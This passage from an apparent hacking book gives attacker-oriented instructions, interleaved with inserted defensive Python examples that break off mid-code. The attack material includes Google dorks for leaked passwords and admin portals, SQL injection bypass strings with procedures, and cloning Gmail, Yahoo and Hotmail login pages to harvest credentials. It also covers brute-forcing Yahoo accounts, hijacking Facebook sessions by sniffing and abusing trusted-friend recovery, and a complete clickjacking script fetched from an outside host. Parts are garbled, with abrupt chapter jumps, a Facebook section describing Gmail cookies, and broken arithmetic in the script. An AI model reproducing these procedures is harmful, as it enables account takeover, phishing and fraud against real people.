"Active Webcam Page" inurl:8080
Active WebCam is a shareware program for capturing and sharing the video streams from a lot of video devices. Known bugs: directory traversal and cross site scripting.

"Online Store - Powered by ProductCart"
ProductCart is "an ASP shopping cart that combines sophisticated ecommerce features with time-saving store management tools and remarkable ease of use. It is widely used by many e-commerce sites". Multiple SQL injection vulnerabilities have been found in the product; they allow anything from gaining administrative privileges (bypassing the authentication mechanism) to executing arbitrary code.

"Powered by A-CART"
A-CART is an ASP shopping cart application written in VBScript. It is comprised of a number of ASP scripts and an Access database. A security vulnerability in the product allows remote attackers to download the product's database, thus gaining access to sensitive information about users of the product (name, surname, address, e-mail, credit card number, and user's login password).

"Powered by GTChat 0.95"+"User Login"+"Remember my login information"
There is an (adduser) remote denial of service vulnerability in version 0.95.
Files containing usernames

filetype:reg reg +intext:"internet account manager"
This Google search reveals user names, POP3 passwords, email addresses, servers connected to and more. The IP addresses of the users can also be revealed in some cases.

inurl:admin filetype:asp inurl:userlist
This search reveals userlists of administrative importance. Userlists found using this method can range from benign "message group" lists to system userlists containing passwords.

inurl:admin inurl:userlist
This search reveals userlists of administrative importance. Userlists found using this method can range from benign "message group" lists to system userlists containing passwords.

site:extremetracking.com inurl:"login="
The search reveals usernames (right in the URL in green) and links to the sites that are signed up with extremetracking.com. From here an attacker can view any of the site's stats, including all the visitors to the site that is being tracked, including their IP addresses.
Files containing passwords

ext:php intext:"$dbms""$dbhost""$dbuser""$dbpasswd""$table_prefix""phpbb_installed"
Hacking a phpBB forum. Here you can gather the MySQL connection information for their forum database. View the .php info by using Google's cache feature.

filetype:ini wcx_ftp
This searches for Total Commander FTP passwords (encrypted) in a file called wcx_ftp.ini. Only 6 hits at the moment, but there may be more in the future.

filetype:log inurl:"password.log"
These files contain cleartext usernames and passwords, as well as the sites associated with those credentials. Attackers can use this information to log on to that site as that user.

filetype:sql "insert into" (pass|passwd|password)
Looks for SQL dumps containing cleartext or encrypted passwords.
Pages containing login portals

"site info for" "Enter Admin Password"
This will take you to the Cash Crusader admin login screen. It is my first Google hack.. also try adding index.php at the end, have fun people :)

intext:"vbulletin" inurl:admincp
vBulletin Admin Control Panel.

inurl:login.asp
This is a typical login page. It has recently become a target for SQL injection.

inurl::2082/frontend -demo
This gives you access to cPanel login dialogues/screens.
Various online devices

intitle:"ipcop - main"
IPCop Firewall is a Linux firewall for home and SOHO users. IPCop can be managed from a simple web interface (which can be found and managed by Google hackers ;)

intitle:"IVC Control Panel"
IVC Control Panel.

intitle:"Live NetSnap Cam-Server feed"
NetSnap online cameras.

intitle:"V1" "welcome to phone settings" password
This is a small search for the iTalk BB899 Phone Adaptor login page. iTalkBB is a local and long distance calling service provided by iTalk Broadband Corporation. It combines voice and internet networks to provide inbound and outbound long distance and local calling solutions.
Vulnerable servers

intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"
Searches for phpMyAdmin installations that are configured to run the MySQL database with root privileges.

"html allowed" guestbook
When this is typed into Google it finds websites which have HTML-enabled guestbooks.

"Welcome to PHP-Nuke" congratulations
This finds default installations of the PostNuke CMS system. In many cases, default installations can be insecure, especially considering that the administrator hasn't gotten past the first few installation steps.

"Welcome to Administration" "General" "Local Authentication" inurl:admin
This reveals the admin site for Argo Software Design Mail Server.
You can download an automated Google hacking tool to make this effort much easier. Goolag Scanner is the automated tool used for Google hacking.
Download Link: http://downloadsquad.switched.com/tag/goolag%20scanner/
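A defensive use of the same dork list, as an added example that is not from the book: the filename and content patterns behind the dorks above are checked against a local web root, so a site owner finds such files before a search engine does. The directory layout and file contents are constructed for the demonstration.

```python
"""Audit a web root for the file types the dorks above find.

Added example, not from the book: the dork patterns quoted in this chapter are
turned into local filename/content checks so a site owner can find such files
before a search engine indexes them. The sample web root is built in a temp
directory; its paths and contents are constructed for the demonstration.
"""
import os
import re
import tempfile

# (description, pattern on the path relative to the web root, content pattern or None)
RULES = [
    ("cleartext credential log (filetype:log inurl:password.log)",
     re.compile(r"password\.log$", re.I), None),
    ("Total Commander FTP credentials (filetype:ini wcx_ftp)",
     re.compile(r"wcx_ftp\.ini$", re.I), None),
    ("SQL dump with a password column (filetype:sql \"insert into\" password)",
     re.compile(r"\.sql$", re.I),
     re.compile(r"insert\s+into.*\b(pass|passwd|password)\b", re.I | re.S)),
    ("phpBB config exposing database credentials (ext:php $dbpasswd)",
     re.compile(r"\.php$", re.I), re.compile(r"\$dbpasswd")),
    ("exported mail account registry file (filetype:reg internet account manager)",
     re.compile(r"\.reg$", re.I), re.compile(r"internet account manager", re.I)),
    ("user list under an admin path (inurl:admin inurl:userlist)",
     re.compile(r"admin[\\/].*userlist", re.I), None),
]


def audit_webroot(root):
    """Return sorted (relative path, description) pairs for files matching a rule."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            for desc, path_re, content_re in RULES:
                if not path_re.search(rel):
                    continue
                if content_re is not None:
                    try:
                        with open(full, "r", errors="replace") as fh:
                            head = fh.read(65536)  # the head of the file is enough
                    except OSError:
                        continue
                    if not content_re.search(head):
                        continue
                findings.append((rel, desc))
    return sorted(findings)


def build_sample_webroot():
    """Constructed web root: four exposed files, two harmless ones."""
    root = tempfile.mkdtemp(prefix="webroot_")
    samples = {
        "logs/password.log": "user=alice pass=hunter2 site=shop.example.test\n",
        "backup/site.sql": "INSERT INTO users (name, password) VALUES ('bob', 'x');\n",
        "forum/config.php": "<?php $dbhost='localhost'; $dbuser='fb'; $dbpasswd='s3cret';\n",
        "admin/userlist.asp": "<% ' administrative user list %>\n",
        "index.html": "<html>hello</html>\n",
        "docs/readme.sql.txt": "not a dump\n",
    }
    for rel, body in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, desc in audit_webroot(build_sample_webroot()):
        print(f"{rel}: {desc}")
```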
Chapter 7
SQL Injection & Countermeasures

Objectives:
Some strings used to perform SQL injection
Some Google dorks to find vulnerable login portals
How to hack a website using SQL vulnerable strings
Error based SQL injection
Blind SQL injection
Google dorks to find SQL injection vulnerable websites
Automated tools
SQL injection countermeasures
SQL injection is a method used for bypassing user authentication on a web form (login portal). An attacker gives a malicious string as input to the web form, which takes the user to the admin area of the website. After gaining access to the admin area, an attacker can add and delete files and play with the website's contents.
Some Strings used to perform SQL injection ' or 1=1-' or ‘=’ ' or 'a'='a hi' or 1=1 -' or 1=--
Some Google dorks to find vulnerable login portals
/admin/adminlogon.asp
/admin/admin_login.asp
/admin/admin_logon.asp
/administrator/admin.asp
/administrator/login.asp

How to hack a website using SQL vulnerable strings
Find any vulnerable login portal using the Google dorks mentioned above. Give any SQL string as input to both the username and password fields. You can try all the strings until you succeed in gaining access to the admin area.
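To see why the strings above work and what the countermeasure looks like, here is an added example (not the book's code): an in-memory SQLite login table is checked first by the string-concatenated query such portals use and then by a parameterised query with a hashed comparison. The user account and its password are constructed sample data.

```python
"""The bypass strings above against a vulnerable and a hardened login query.

Added example, not from the book. An in-memory SQLite table holds one
constructed account. vulnerable_login() builds the SQL by string
concatenation, as the portals found by the dorks above typically did;
hardened_login() uses a parameterised query and a hashed comparison.
The bypass strings are submitted in both fields, as the procedure says.
"""
import hashlib
import hmac
import sqlite3

BYPASS_STRINGS = ["' or 1=1--", "' or 'a'='a", "hi' or 1=1 --"]


def _hash(password):
    # Demonstration only: a real application uses a slow, salted password
    # hash (bcrypt, scrypt, argon2) rather than plain SHA-256.
    return hashlib.sha256(password.encode()).hexdigest()


def make_db():
    """One constructed user, stored both in cleartext (legacy) and hashed."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, password_hash TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?, ?)",
                 ("admin", "Tr0ub4dor", _hash("Tr0ub4dor")))
    return conn


def vulnerable_login(conn, username, password):
    """Return (authenticated, database_error). Input is pasted straight into the SQL."""
    sql = ("SELECT username FROM users WHERE username='" + username +
           "' AND password='" + password + "'")
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.OperationalError as exc:
        # A stray quote breaks the statement; the raw error text is what the
        # error-based test later in this chapter looks for, so it must never
        # be shown to the user.
        return False, str(exc)
    return row is not None, None


def hardened_login(conn, username, password):
    """Parameterised lookup plus constant-time comparison of the hash."""
    row = conn.execute("SELECT password_hash FROM users WHERE username = ?",
                       (username,)).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(row[0], _hash(password))


if __name__ == "__main__":
    conn = make_db()
    for s in BYPASS_STRINGS:
        print(repr(s), "vulnerable:", vulnerable_login(conn, s, s)[0],
              "hardened:", hardened_login(conn, s, s))
```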
Error based SQL injection

1). Check for vulnerability
Let's say that we have some site like this: http://www.site.com/news.php?id=1
Now, to test if it is vulnerable, we add a ' (quote) to the end of the URL, so it becomes http://www.site.com/news.php?id=1'
If it is vulnerable you should get an SQL error such as
"Sorry: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1" or something like that.

2). Find the number of columns
To find the number of columns we use the ORDER BY statement. This clause tells the SQL database how to order the result. We use it to find how many columns the query returns. You need to type order by 1/* (or 1--) and keep adding one until you get an error.
Example: http://www.site.com/news.php?id=1 order by 1/*

https://www.gmail.com/login
Yahoo -> https://www.login.yahoo.com
Hotmail -> https://www.login.live.com
Save the page as HTML, open it in Notepad, then go to View -> Find and put action=" in the find dialog box.
For Gmail -> Replace action="https://www.gmail.com/login" with action="next.php"
For Yahoo -> Replace action="https://www.login.yahoo.com with action="next.php"
For Hotmail -> Replace action="https://www.login.live.com with action="next.php"
Change the method to GET instead of POST, then save it as index.php
Coding of next.php
Make a blank text file and save it as passwords.txt. Now we have to upload index.php, next.php and passwords.txt to any free server hosting website (I prefer my3gb.com). Here index.php is our clone page; we have to send this page to the victim. Once the victim logs in through the hoax page, the login information will be automatically sent to passwords.txt. Suppose our clone page address is my3gb.com/malviya/index.php; then we have to send this page to the victim in order to hack the email account. Use some social engineering techniques to make the hack effort more effective.

Defense against phishing attack
Download the Netcraft anti-phishing toolbar for your browser from http://toolbar.netcraft.com/ to defend against phishing scams.
(4) By Password Bruteforcing
We can crack the password of a Yahoo email account by using a wordlist & the bruteforcing method. Gmail & Hotmail accounts can't be bruteforced. We use the Brutus tool for bruteforcing of Yahoo email account passwords.
Brutus Download: http://www.hoobie.net/brutus/brutus-download.html - Official Download
We can put Brutus on a flash drive and run it from there; it is a portable program and requires nothing to be run. It can also be run under WineHQ on Linux (I have personally tested). Open up Brutus and configure it as follows. The following settings must be set up:
*Target : pop3.yahoo.com
*Attack Type : Pop3
*Connections : 60 (all the way)
*Timeout : 60 (all the way)
*Try to stay connected all the way
*Single User (put the email to attack here)
*I would suggest using a proxy (google it; they are normally in IP:PORT format)
If you don't already have a good wordlist, you can grab mine from here: http://www.ziddu.com/download/8565751/PasswordDictionary.zip.html
Basically it will just attempt every password in the dictionary till it finds the right password. If the dictionary attack fails, we can also attempt a Brute Force attack (also called a cryptanalysis attack) where it goes through and guesses every possible string combination.
# Gmail account passwords can't be bruteforced because it uses a captcha system at the time of the authentication process.
Email Account Security Measures
(1) The best way to protect an email account from hackers is to use strong passwords. A strong password contains upper case, lower case, numbers & symbols. Set a password by using the phrase "Mary had a little lamb. The lamb had white fleece." Consider the first letter of each word, e.g. MHALLTLHWF. Put every second letter of the abbreviation in lower case. Replace "A" with "@" & "L" with "!"; thus a new password is formed which contains more than 8 characters. New Password: Mh@!Lt!hWf
(2) Use a sign-in seal (for Yahoo users); the sign-in seal protects users from phishing scams.
(3) Set an alternate email address during signup; a lost password can be recovered to the alternate email address.
(4) Set your mobile number during signup; it helps us to recover our account.
(5) Never select the option "keep me signed in" or "remember me" at the time of login. If you select this option, next time it will automatically open your account on the same computer.
(6) Use email security tools (Email Protector, SuperSecret).
Download Link for Email Protector: http://www.softpedia.com/get/Internet/Email/Mail-Utilities/Email-Protector.shtml
Download Link for SuperSecret: http://download.cnet.com/SuperSecret/300018501_4-91956.html
Password Recovery Tools
Mail PassView: It is a small recovery tool that reveals passwords and other account details for Yahoo, Gmail, Hotmail, Outlook etc. email clients.
Download Link: http://majorgeeks.com/Mail_PassView_d3860.html
Mail Password: Mail Password is a universal password recovery tool for POP3 email accounts.
Download Link: http://download.cnet.com/Email-Password-Recovery-Master/300018501_4-10641123.html
Password revealer javascript: This javascript is used to reveal login information hidden behind asterisks (*****). We just have to put the script in the address bar; it will reveal the password hidden behind the asterisks within a minute.
Code: javascript: alert(document.getElementById('Passwd').value);
Chapter 11
Facebook account hacking & security

Objectives:
Facebook account hacking using Wireshark
Facebook account hacking using Firesheep
Facebook account hacking using recovery options
Facebook account security countermeasures
Facebook is one of the most widely used social networking websites, with more than 750 million users, which is the reason it has become a hot target of all hackers.

How to hack anyone's Facebook account when both victim and attacker are using the same network?
(1) Using Wireshark
First of all I must make clear that even though you'll get access to the victim's account, you'll not get his/her password; next, this trick will work only on a LAN with a hub. For this hack you'll need Wireshark, which is a packet sniffing tool, the Mozilla Firefox web browser and the Add N Edit Cookies add-on for Mozilla Firefox. Now I assume you have all the above components for hacking Facebook and you are connected to a hub based LAN or a LAN which has been ARP poisoned. So now click on the capture button and start capturing packets. Now, using a command line shell, ping www.facebook.com to get its IP address, filter all IP packets having the IP address of www.facebook.com and search for the HTTP protocol followed by GET /home.php; this may vary depending on region and time zone, but don't bother, try to search all packets with HTTP GET for cookies. Now from the packet details window expand the packet information for the above packet and you'll get 8-10 different cookies that are stored by www.gmail.com on the victim's PC. Right click and copy all cookie names and values into Notepad. Now open Mozilla Firefox, browse to Tools and open the Cookie editor. Add each cookie to your cookie folder using the Cookie editor. Now close the Cookie editor and open Gmail; you'll find yourself logged into the victim's account.

Defense against this attack: A system administrator should use tools for countering sniffing. Don't log in to your accounts if you know your LAN is not protected, and if you want to log in, better use a tunneled connection.
Download Wireshark from http://www.wireshark.org/. Download Add N Edit Cookies from Mozilla Add-Ons.

(2) Using Firesheep
Firesheep is an extension developed by Eric Butler for the Firefox web browser. The extension uses a packet sniffer to intercept unencrypted cookies from certain websites (such as Facebook and Twitter) as the cookies are transmitted over networks, exploiting session hijacking vulnerabilities. It shows the discovered identities on a sidebar displayed in the browser, and allows the user to instantly take on the log-in credentials of the user by double-clicking on the victim's name.
Things we need:
1. Firefox browser
2. Firesheep Firefox plugin
Procedure:
1. First download and install the Firefox browser and the Firesheep add-on.
2. Open Firefox. Now click the (1) View button, then select (2) Sidebar, and finally click (3) Firesheep, or simply press (Ctrl + Shift + S) to open Firesheep.
3. Now you can see Firesheep has opened up in the sidebar. Now select your interface by going to Preferences as shown.
4. Now click on the Start Capturing button and wait for a while.
5. Now you can see different pre-authenticated sessions in the sidebar; select the session which you want.
6. Now you will be automatically logged into the victim's account. You can use this tool to hack Facebook/Twitter accounts.

How to hack anyone's Facebook account when victim and attacker are using different networks?
Phishing and cookie stealing can work this time, as I discussed before in the email hacking section (see page no.
Hacking a Facebook account password using the recovery option
Facebook has introduced a feature of "Recovering password using Trusted Friends". In this feature, if we have lost our Facebook account password, Facebook will send a security code to 3 friends. We have to ask those 3 friends for the security codes, and after entering them we can reset the Facebook password. So, in this hack, we will use this feature for hacking a Facebook account password. You have to create 3 fake accounts and make sure that your victim adds them as his friends, so your 3 fake accounts must be listed in your victim's friends list. Now, if we use the above "Trusted friends" feature for resetting the victim's Facebook password, Facebook will send the security codes to our 3 fake accounts and we can easily hack the Facebook account. You can use social engineering skills so that your victim will have no doubt while accepting your fake account as his friend. This is the only tricky part of the hack. Also, the fake accounts must be at least a week old. Once you are done with the fake accounts, move to the steps below.
Step 1. Go to Facebook.com and hit the Forgot Password link to get this page:
Step 2. You have to enter the email of the victim, or even the Facebook profile name will do. Facebook will search for the profile name and you will be shown the account. Hit "This is my account".
Step 3. On the next page, hit "No longer have access to these".
Step 4. You will be prompted for an email address. Enter your email address here and hit "Submit".
Step 5. Facebook will ask you to answer the security question. Use social engineering to find out the correct answer to the question, or else you can go to the next steps by entering three wrong answers (it is not necessary that you will be prompted to the next step of recovery, because it depends from account to account).
Step 6. Now, if you are able to proceed, the next step is recovery through three friends. Here you have to select three friends from a random list generated by Facebook. It is not necessary that your fake accounts will be there in the list, but the possibility is always there.
Now we have to get the codes from all three accounts which were selected during the recovery process; after getting the codes we can set a new password. An email address change mail will be sent to the old associated email id of the victim. The account will be locked out for 24 hours. Now it's the attacker's duty to get access before the victim, otherwise the victim can recover his account.
# The victim can easily recover his account by answering the security question. Once you have set a security question it can't be changed.
Facebook account security countermeasures

Enable HTTPS protocol
Using HTTPS instead of simple HTTP means that you are securing your communication between the server and your computer. No one will be able to intercept the traffic between your computer and the server, so you can be sure that all the information delivered to and from your computer is completely safe. Modern browsers highlight secure URLs with information about the certificate issuing authority. Here is a screenshot of secure Facebook open in Firefox:
To enable HTTPS, you can log in to your Facebook account and go to "Account -> Account Settings". Select Account Security under the Settings tab and check the box beside "Browse Facebook on a secure connection (https) whenever possible".

Use Facebook two-step authentication (Login Approvals)
Like Google, Facebook has also introduced a two-step authentication service called Login Approvals. This service lets you log in to your Facebook account by using your password plus a security authentication code sent to your mobile device. By enabling this service, you will no longer be able to log in to Facebook by only using your password. You will always be required to use the password and the security code sent to your mobile device.

Checking for Facebook email phishing attacks and scams
While you are on Facebook, you should never click on suspicious links, even if the messages were sent from your friends. Most Facebook scams spread by posting messages to the walls of all friends of the infected user. The best place to get updated news about Facebook scams is Facecrooks.com.

Enable Login Notifications
Enabling login notifications in Facebook will notify you when someone logs in from a suspicious location or computer. To enable login notifications, go to "Account -> Account Settings". Under the Settings tab expand "Account Security -> Login Notifications" and check the following two boxes:
Send me an email
Send me a text message

Use the Facebook one-time password service
Like Hotmail, Facebook also provides the facility of a one-time password. A one-time password is a temporary password which can only be used once and expires within 20 minutes of creation. To enable this service, you'll need to activate a phone number so that Facebook can send messages to your mobile. To register and activate a phone number you can go to "Account -> Account Settings".
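The Wireshark and Firesheep attacks earlier in this chapter depend on the session cookie travelling over plain HTTP; the server-side counterpart of the "Enable HTTPS" countermeasure above is to issue session cookies only over HTTPS and with the Secure, HttpOnly and SameSite attributes. Added example, not from the book: it parses Set-Cookie headers and reports which attributes are missing; the cookie names, values and responses are constructed.

```python
"""Audit Set-Cookie headers for the attributes that defeat the cookie theft above.

Added example, not from the book. The Wireshark and Firesheep attacks in this
chapter copy a session cookie that travelled over plain HTTP; the server-side
counterpart of "Enable HTTPS" is to issue session cookies only over HTTPS and
with the Secure, HttpOnly and SameSite attributes. Cookie names, values and
the responses below are constructed samples.
"""

# substrings that suggest a cookie carries a session or login token
SESSION_HINTS = ("sess", "sid", "token", "auth", "login")


def parse_set_cookie(header):
    """Split one Set-Cookie header into (name, value, {attribute: value})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()   # attribute names are case-insensitive
    return name.strip(), value, attrs


def is_session_cookie(name):
    lowered = name.lower()
    return any(hint in lowered for hint in SESSION_HINTS)


def audit_set_cookie(header, over_https):
    """Return the list of problems for one Set-Cookie header (empty if none)."""
    name, _value, attrs = parse_set_cookie(header)
    if not is_session_cookie(name):
        return []           # non-session cookies are out of scope here
    problems = []
    if not over_https:
        problems.append("issued over plain HTTP: readable by anyone sniffing the LAN")
    if "secure" not in attrs:
        problems.append("missing Secure: the browser will also send it over http://")
    if "httponly" not in attrs:
        problems.append("missing HttpOnly: readable by page script (XSS)")
    if "samesite" not in attrs:
        problems.append("missing SameSite: sent on cross-site requests")
    return problems


def audit_responses(responses):
    """Map cookie name -> problems for a list of (scheme, Set-Cookie header) pairs."""
    return {parse_set_cookie(h)[0]: audit_set_cookie(h, scheme == "https")
            for scheme, h in responses}


# Constructed responses: the first is the pattern the sniffing attacks above rely on.
SAMPLE_RESPONSES = [
    ("http",  "sessionid=8f3a1c; path=/; domain=.example.test"),
    ("https", "auth_token=9e2b7d; path=/; domain=.example.test; Secure; HttpOnly; SameSite=Lax"),
    ("https", "sid=44aa; path=/; HttpOnly"),
    ("https", "locale=en_US; path=/"),
]

if __name__ == "__main__":
    for cookie, problems in audit_responses(SAMPLE_RESPONSES).items():
        print(cookie, "OK" if not problems else "; ".join(problems))
```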
Chapter 12
Facebook Clickjacking

Objectives:
How it works
Mitigation
What we'll see in the future
Install it
Countermeasures
It allows setting up a website where users will do a Facebook Like without their knowledge when clicking any link on the page. This works by dragging an invisible (very low opacity) Facebook Like button below the mouse when the user hovers over a link.

How it works
Since we cannot inject CSS or JavaScript inside the Facebook iframe, we cannot change the cursor:pointer CSS property when the mouse is over the Like button, so it would be suspicious to have a page that always shows a clicking-hand mouse cursor. The workaround was making the Like button follow the mouse when it's normal to have a clicking-hand mouse cursor (cursor:pointer), such as when hovering a link! After clicking a link, the user will like the current page on Facebook and will in fact be redirected to the href (through JavaScript magic: document.location.href), and a cookie will be set so that the Facebook Like button no longer appears on future page loads.

Mitigation
The purpose of this script is creating a discussion about how to prevent clickjacking; by using this script for any reason other than security debugging you might be violating Facebook's Terms and Service Statements and might lose your Facebook account. As such, the code you have below is easily found on the web; if you use it in your website I'll personally report you if you use it for malicious reasons.

What we'll see in the future
Before discussing how clickjacking will evolve, there is an important assumption to keep in mind: it's possible to share a website not directly connected to where the Like button is placed, meaning I might place a Like button on fernandomagro.com liking another website/domain. So, it's possible to create a database of websites and generate a lot of different Like buttons consecutively on the same website. Wrapping it all up, when Facebook clickjacking goes viral, I believe we will start seeing consecutive clickjacking likes/shares from malicious websites with huge galleries where a lot of clicking takes place. Example: having a gallery with 500 interesting pictures, imagine clicking through those galleries for 2 hours and then returning to Facebook and realizing the account was flooded with a huge amount of unrequested likes.

Install it
I managed to wrap it all up in a nice JavaScript file that you just need to include to make it work in your webpage. Change the headers of your webpage with the following:
window.DO_CLICKJACKING = 1
Then, download the file from http://malviya.my3gb.com/clickjacking.js and put it in an accessible folder:
Code:
var $J = jQuery.noConflict();
// solve: images and floating divs
function heightestChild(elem) {
  var t=0;
  var t_elem;
  $J("*",elem).each(function () {
    if ( $J(this).outerHeight(true) > t ) {
      t_elem=$J(this);
      t=t_elem.outerHeight(true);
    }
  });
  // we care about the heighest
  if (elem.outerHeight(true) > t) {
    t = elem.outerHeight(true);
  }
  //return elem.outerHeight(true);
  return t+3; // hotfix
}
function highestOffsetTop(elem) {
  var t=elem.offset().top;
  var t_elem;
  $J("*",elem).each(function () {
    if ( $J(this).offset().top < t ) {
      t_elem=$J(this);
      t=t_elem.offset().top;
    }
  });
  // we only care about the object that is most on top
  if (elem.offset().top < t) {
    t = elem.offset().top;
  }
  //return elem.offset().top;
  return t+3;
}
// 57 19 63
$J(document).ready(function(){
  if (window.DO_CLICKJACKING) {
    // wrap up EVERYTHING
    /*$J("body").append('');*/
    $J("body").append('');
    var elementWidth = 0;
    var elementHeight = 0;
    var theElement = '';
    var likeDone = 0;
    if ($J.cookie("clickjacking_"+escape(document.URL)) == 1) {
      likeDone = 1;
    }
    // fired when the user clicks a link (likes our page) -> clickjacking is done
    FB.Event.subscribe('edge.create', function(response) {
      $J("#clickjacking").css("display", "none");
      likeDone = 1;
      $J.cookie("clickjacking_"+escape(document.URL), "1");
      // let the user actually go to the link he clicked.
      window.location.href = theElement.attr('href');
    });
    $J(document).mousemove(function(event) {
      if (theElement != '') {
        if (event.pageY < (highestOffsetTop(theElement)-4) ||
            event.pageY > (highestOffsetTop(theElement) + heightestChild(theElement)) ||
            event.pageX < theElement.offset().left ||
            event.pageX > (theElement.offset().left + theElement.width()) ) {
          //alert(event.pageY + " " + theElement.height() + " " + theElement.offset().top);
          /* $J("#log").append("mouse off the element LEFT " + event.pageX + " " + theElement.offset().left + " " + (theElement.offset().left + theElement.width()) + "");
             $J("#log").append("mouse off the element TOP " + event.pageY + " " + highestOffsetTop(theElement) + " " + (highestOffsetTop(theElement) + heightestChild(theElement,true)) + ""); */
          theElement = ''; // the mouse is off theElement
          $J("#clickjacking").css("display", "none");
        } else {
          if ($J.browser.msie) {
            $J("#clickjacking").css("top",(event.pageY15)+"px");
            $J("#clickjacking").css("left",(event.pageX20)+"px");
          } else {
            $J("#clickjacking").css("top",(event.pageY5)+"px");
            $J("#clickjacking").css("left",(event.pageX20)+"px");
          }
        }
      }
    });
    $J(document).delegate("a","mouseenter", function (){
      // register mouse is inside element
      if (likeDone == 0) {
        theElement = $J(this);
        $J("#clickjacking").css("display", "block");
      }
    });
  } // window.DO_CLICKJACKING
});

/**
 * Cookie plugin
 *
 * Copyright (c) 2006 Klaus Hartl (stilbuero.de)
 * Dual licensed under the MIT and GPL licenses:
 * http://www.opensource.org/licenses/mit-license.php
 * http://www.gnu.org/licenses/gpl.html
 *
 */

/**
 * Create a cookie with the given name and value and other optional parameters.
 *
 * @example $.cookie('the_cookie', 'the_value');
 * @desc Set the value of a cookie.
 * @example $.cookie('the_cookie', 'the_value', { expires: 7, path: '/', domain: 'jquery.com', secure: true });
 * @desc Create a cookie with all available options.
 * @example $.cookie('the_cookie', 'the_value');
 * @desc Create a session cookie.
 * @example $.cookie('the_cookie', null);
 * @desc Delete a cookie by passing null as value. Keep in mind that you have to use the same path and domain
 *       used when the cookie was set.
 *
 * @param String name The name of the cookie.
 * @param String value The value of the cookie.
 * @param Object options An object literal containing key/value pairs to provide optional cookie attributes.
 * @option Number|Date expires Either an integer specifying the expiration date from now on in days or a Date object.
 *                             If a negative value is specified (e.g. a date in the past), the cookie will be deleted.
 *                             If set to null or omitted, the cookie will be a session cookie and will not be retained
 *                             when the the browser exits.
 * @option String path The value of the path atribute of the cookie (default: path of page that created the cookie).
 * @option String domain The value of the domain attribute of the cookie (default: domain of page that created the cookie).
 * @option Boolean secure If true, the secure attribute of the cookie will be set and the cookie transmission will
 *                        require a secure protocol (like HTTPS).
 * @type undefined
 *
 * @name $.cookie
 * @cat Plugins/Cookie
 * @author Klaus Hartl/[email protected]
 */

/**
 * Get the value of a cookie with the given name.
 *
 * @example $.cookie('the_cookie');
 * @desc Get the value of a cookie.
 *
 * @param String name The name of the cookie.
 * @return The value of the cookie.
 * @type String
 *
 * @name $.cookie
 * @cat Plugins/Cookie
 * @author Klaus Hartl/[email protected]
 */
jQuery.cookie = function(name, value, options) {
  if (typeof value != 'undefined') { // name and value given, set cookie
    options = options || {};
    if (value === null) {
      value = '';
      options.expires = -1;
    }
    var expires = '';
    if (options.expires && (typeof options.expires == 'number' || options.expires.toUTCString)) {
      var date;
      if (typeof options.expires == 'number') {
        date = new Date();
        date.setTime(date.getTime() + (options.expires * 24 * 60 * 60 * 1000));
      } else {
        date = options.expires;
      }
      expires = '; expires=' + date.toUTCString(); // use expires attribute, max-age is not supported by IE
    }
    // CAUTION: Needed to parenthesize options.path and options.domain
    // in the following expressions, otherwise they evaluate to undefined
    // in the packed version for some reason...
    var path = options.path ? '; path=' + (options.path) : '';
    var domain = options.domain ? '; domain=' + (options.domain) : '';
    var secure = options.secure ? '; secure' : '';
    document.cookie = [name, '=', encodeURIComponent(value), expires, path, domain, secure].join('');
  } else { // only name given, get cookie
    var cookieValue = null;
    if (document.cookie && document.cookie != '') {
      var cookies = document.cookie.split(';');
      for (var i = 0; i < cookies.length; i++) {
        var cookie = jQuery.trim(cookies[i]);
        // Does this cookie string begin with the name we want?
        if (cookie.substring(0, name.length + 1) == (name + '=')) {
          cookieValue = decodeURIComponent(cookie.substring(name.length + 1));
          break;
        }
      }
    }
    return cookieValue;
  }
};
Now post the webpage link to the victim's wall. When the victim clicks on the Like button, he will be redirected to your webpage.

Countermeasures
(1) Don't click on shortened URLs (bit.ly, goo.gl etc.).
(2) Don't click on naked or violent image & video links.
(3) Don't click on any application which has a different domain than facebook.
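The countermeasures above are for the user; on the server side, a page can only be dragged under someone's mouse on another site if that site is allowed to load it in a frame. The Like button is meant to be framed, so Facebook has to protect it on its own side, but for pages you serve yourself the defence is the X-Frame-Options header or a Content-Security-Policy frame-ancestors directive. Added example, not from the book or the script above: it evaluates those headers for a page origin and a framing origin; every header and origin is a constructed sample.

```python
"""Can this page be framed? The server-side clickjacking defence a site owner controls.

Added example, not from the book. The Facebook Like button is meant to be
framed, so Facebook has to protect it on its own side; for pages you serve
yourself the defence against an overlay like the one above is the
X-Frame-Options header or the Content-Security-Policy frame-ancestors
directive. This evaluates both the way current browsers do. Every header and
origin below is a constructed sample.
"""
from urllib.parse import urlparse


def _parse_csp(csp):
    """Return {directive: [source tokens]} from a Content-Security-Policy value."""
    directives = {}
    for part in csp.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    return directives


def _host_matches(pattern, host):
    """Match a host pattern such as '*.partner.test' or 'app.partner.test'."""
    if pattern.startswith("*."):
        return host.endswith(pattern[1:]) and host != pattern[2:]
    return host == pattern


def _source_matches(source, framer, page_origin):
    """Does one frame-ancestors source expression permit the framing origin?"""
    src = source.lower()
    f = urlparse(framer.lower())
    if src == "'none'":
        return False
    if src == "'self'":
        return framer.lower() == page_origin.lower()
    if src == "*":
        return True
    if src.endswith(":") and "/" not in src:          # scheme source, e.g. https:
        return f.scheme == src[:-1]
    if "://" in src:                                  # scheme + host pattern
        scheme, _, rest = src.partition("://")
        host = rest.split("/")[0].split(":")[0]
        return f.scheme == scheme and _host_matches(host, f.hostname or "")
    return _host_matches(src, f.hostname or "")       # bare host pattern


def may_be_framed(headers, page_origin, framer_origin):
    """True if a browser honouring these headers would render page_origin inside framer_origin."""
    lower = {k.lower(): v for k, v in headers.items()}
    csp = lower.get("content-security-policy")
    if csp:
        directives = _parse_csp(csp)
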